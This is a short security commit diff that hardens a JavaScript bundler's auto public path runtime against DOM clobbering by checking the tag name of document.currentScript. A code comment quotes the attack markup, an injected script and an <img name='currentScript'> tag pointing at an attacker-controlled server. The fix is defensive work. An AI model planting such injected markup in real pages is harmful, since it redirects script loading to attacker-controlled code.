security: fix DOM clobbering in auto public path

alexander-akait · alexander-akait · commit 2411661bd1be · 2024-08-21T15:47:34.000+03:00
diff --git a/lib/runtime/AutoPublicPathRuntimeModule.js b/lib/runtime/AutoPublicPathRuntimeModule.js
@@ -50,7 +50,10 @@ class AutoPublicPathRuntimeModule extends RuntimeModule {
 						`var document = ${RuntimeGlobals.global}.document;`,
 						"if (!scriptUrl && document) {",
 						Template.indent([
-							"if (document.currentScript)",
+							// Technically we could use `document.currentScript instanceof window.HTMLScriptElement`,
+							// but an attacker could try to inject `<script>HTMLScriptElement = HTMLImageElement</script>`
+							// and use `<img name="currentScript" src="https://attacker.controlled.server/"></img>`
+							"if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT')",
 							Template.indent("scriptUrl = document.currentScript.src;"),
 							"if (!scriptUrl) {",
 							Template.indent([
